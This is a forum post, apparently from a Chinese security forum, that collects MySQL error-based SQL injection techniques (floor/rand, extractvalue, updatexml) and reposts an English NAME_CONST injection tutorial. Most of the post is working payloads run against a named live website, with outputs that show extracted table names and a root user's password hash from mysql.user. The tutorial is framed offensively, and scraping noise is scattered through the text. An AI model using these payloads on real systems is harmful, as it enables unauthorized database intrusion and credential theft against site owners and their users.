|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
- n0 q3 _) c) D- u' H& \1 z首先进行正常查询: mysql> select * from article where id = 1;7 Z% q% N- X5 y' g1 w
+—-+——-+———+
, ~4 H# F# F6 x" ~( Q7 ~| id | title | content |
3 p2 }- |' c# z+—-+——-+———+4 V* z* P) M- z& H6 [# ^8 n
| 1 | test | do it |* a1 O# }1 m& L' J' N
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ l, N# M% A# R9 @ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。, Q7 w9 `) q: i- n7 i9 W: G a
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);$ n! Y) g$ \% C2 s
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));7 T3 K# L# r( m w1 q$ `
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
5 m n" w) B I1 |* t2 p测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
' J7 X- q7 o7 F# OERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 6 S D. }+ h, D$ `. y' f6 g
8 y3 h0 B9 ^" O" b2 Q% g) N9 j再收集: 0 J6 Q# r7 t" |) i" _
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
$ ?2 z' {: G6 ^0 `" f$ o% o( y" [
. a2 w/ v: Q$ _+ u% W; k) y- _Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’7 K9 s0 ?- A; a
% z, s+ M" \9 R* Ihttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
2 `; V8 p5 c! U# }# t+ v- I; X4 @ P/ O2 Q( L
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
6 B7 V' |/ K$ C+ H; Q, X- u+ P
1 F& q V9 s$ T; Y7 t# c$ a: JMYSQL高版本报错注入技巧-利用NAME_CONST注入
: x9 N2 W9 ]2 Q, d, wIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
% Y8 w2 W- W& ^3 U4 e! x# `$ w. P8 Y
1 K: J$ J/ a6 Z8 C: o7 \5 ^相关信息' _) ]7 P+ e3 r1 q& R
0 V6 p4 h4 w; u. f, dNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.' f5 r4 t5 l8 P: w5 P, x
% `! C6 x& u9 \( @ F: M7 X
Code:
" g6 a) Q G+ L. HNAME_CONST(DATA, VALUE)/ i6 @/ X0 R7 z9 ?# v0 ^) k( w
' Y/ a0 G4 e. ~2 R, l) HReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.4 E. X2 H( j4 b" d5 q# A
. n) |' }; u5 j# Q" T
SELECT NAME_CONST('TEST', 1)
" o2 I# d9 s, g
, {. i' f9 r: z' O( A7 z0 X! u9 w8 p) t, f
/ s' O6 s6 B5 Q- U# |
|---------------|
! ^; S# E/ s+ {2 x5 q6 a/ j| TEST |
3 [; R8 E+ X B1 K| |
* x& w3 |2 [ W- B|---------------|5 I- k. G1 I; X
| 1 |! ^3 h* b. c& p) l) o/ q
| |$ J; d& t/ ^5 b9 {* S
|---------------|; A5 i. I! ?8 B
- a% `& f1 q' E( R4 D
7 b5 n9 g) v3 ^
5 ]9 D, U* s# _+ Q+ B, Z$ s) T' }2 R9 ]; S5 G4 h1 u
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
: {' P3 M" |3 \# k. kIntro to MySQL Variables4 \( x# l, X/ w+ K
5 g" I4 t$ O: \9 [# ]1 x% G4 zOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.$ p- O/ k2 A- n5 o4 W3 {- J' ]
6 i+ z6 ~# w) ~% e( PCode:
6 y# x! }2 E- K7 A8 @1 u2 Yhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261* x; f# }5 }/ J/ N
/ U I* P% J( a8 T1 c
% C1 g, ?/ W7 q& \2 M4 K' |/ X0 @( r6 x2 G# `: p9 ]
9 N: @4 t P& r1 k% k' h, D
* I! F; L3 z& L M4 YCode:
( C$ Y6 e0 ~. E- a2 @" Y0 h- zand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--3 f- o& D# {- f5 o' m% W
6 r& Z8 Q/ G3 S, s4 ?# a6 R' N
+ X6 N$ x& P( R0 U1 ]8 F4 dVAR = Your MySQL variable.
) |0 {6 g+ L! c& _ I) C3 o: }" }3 e% J0 d9 R
MySQL 5.1.3 Server System Variables/ A2 U: w# s& ~5 R, s1 y t
4 N. L" i! G: m( X. ]' v
Let's try it out on my site..0 |3 h* U7 J" Y: r/ P: T6 A
& y9 w I* A* i9 N% O- UCode:; f% k" @* u. v, `! }
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
& W3 G' C7 `! t- M
n- H) q% j( QErroruplicate column name '5.0.27-community-nt'* O" y* i5 a- P+ _, S* z3 x9 C
% D6 E8 a0 R2 k
- A" T' m% b' \, T# y X1 n* W2 l6 E! q1 C7 E
: I8 l! |0 Z$ B) c8 E1 |+ L2 d5 z. B+ x
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
! V0 }% y9 R' V% ~. |3 N/ U
" k7 L: G$ K+ {8 H$ P- X" oData Extraction; t. S; E9 _# B$ {" I
5 w) \6 p) T- @/ s+ o' Y
Code:
4 f0 O- n2 O R+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--# Y9 G/ h3 @8 y* V
$ W9 \# r% t1 u3 V- R0 s
0 y, F6 |8 f- B! \3 T% K
We should get a duplicate column 1 error...6 I+ R) N: q# z0 F
E1 o z; }* DCode:0 S$ v& x/ \# [2 P! b0 r/ r3 o
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
: K/ R( ?3 x" n; P9 a/ d
6 F- G( s# P# z+ v1 P1 O5 rErroruplicate column name '1
, g# H- Z0 |( p4 h; t
) S( o# L. v, x' P
& V7 R" z& y" E( `1 j0 k! J3 q- }4 w0 e- i4 y
7 o) \3 ~% Z+ i* [$ h, C( }* f, [% P0 V; [. Y) N
. a2 J& v( ?! |$ G# u! z/ O6 U- m l
Now let's get the tables out this bitch..4 o5 _& ]% |( f* ^( u
4 w( ~" k, o# jCode:
' U# z9 b) t% J. {4 J5 Q5 p7 V/ r8 B4 D+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
2 R8 `% |% y* Q0 a) o
$ r/ j8 E( z$ c. p j9 v0 @3 M* z$ L6 }2 J$ H0 {' q+ m) u
Let's see if it works here, if it does, we can go on and finish the job.
6 x9 W. [8 `9 E6 y6 W2 G2 r& ^+ x* r( E; x. [
Code:
+ q( r; n+ J. ahttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
" z) [+ Y6 U6 r3 H
5 C; A" p$ E. v) K3 R) M' }( I" j2 ^$ [1 P' J G
Erroruplicate column name 'com_admanage: Y7 w, t q4 \6 ^
@0 L5 l0 ~2 X: c9 I A! S
8 o* ?& t, }% B; h
3 B) n# G1 n& L5 M
" d3 {9 k) }: l( t8 {
^1 V7 R8 Q+ u
$ y! F6 A+ O1 K& cNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
2 S+ S) L' x \! Q( b4 j
! h! o9 A6 w7 H, ? O& aLet's get the columns out of the user table..
& A! _8 E( w7 g9 `& p# o" S; y; I0 ?, X
Code:" }+ l7 y9 _: u9 J: f! O( m/ \
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--7 }# R# d/ n4 t9 d
( O+ y# q* ]; [- h" n% H+ w
: q. w0 T4 ?1 b9 _1 W
So mine looks like this, and I get the duplicate column name 'Host'.7 \5 @8 C5 [7 I% p3 K- Z
1 h" o) T0 b( O' NCode:
/ u- q% B0 T3 N" whttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
7 ^- k- N6 f. X3 h6 D: ~. r2 I! ~$ N. V. V( a% O
Erroruplicate column name 'Host' \9 o6 ]) `' f( R/ Y
; ?8 y( t5 z7 c4 h6 g& S7 X* c7 h+ b1 O7 r/ |; t0 d. t
) h1 B( p% G0 M7 E1 o# K
7 B& {& ], U, a6 K7 D! ]
! v4 o# Z9 j: } |' b
2 t0 i& D8 P+ f' j: @/ {
Woot, time to finish this bitch off.8 t+ z* v0 S8 W" v& }; A7 K) v9 |
- J& g* l" M6 ? P+ T Q
Code:
' L, Z/ p" S }2 P+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--0 b5 U* |+ r% J& T) T- _
8 z+ w8 V$ _% O3 k" R, g, X
8 I% V1 R& r2 w$ U$ y& \# y! tSo mine looks like this...( L2 ^/ X6 f- i d/ n
2 P- L% W5 y- r5 E9 S3 D0 S3 `& B, L
Code:
& \. h/ F5 o; V0 c. V" Shttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--# V; \3 `2 U, c2 G# m
2 h3 l E$ p! s$ C/ _7 [
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
$ ^, l, U. R: H2 |' q4 e0 j( t c/ z. Z9 b
' P/ F3 M, y: w/ Q% U/ G- A0 S% P' Y
; a* ] b% r1 K8 Q6 K3 W. O5 f( X0 X2 U+ r' K1 Z3 p
$ {7 K0 x4 D2 T1 @" w/ w" C X+ C
" [0 b. @) Q4 c# \( @; s: A5 O
And there we have it, thanks for reading.
. P" I/ V/ l6 i* z
2 B* t4 A9 d6 A8 s1 T2 y1 c |
发表于 2015-11-11 19:03:37
收藏
支持
反对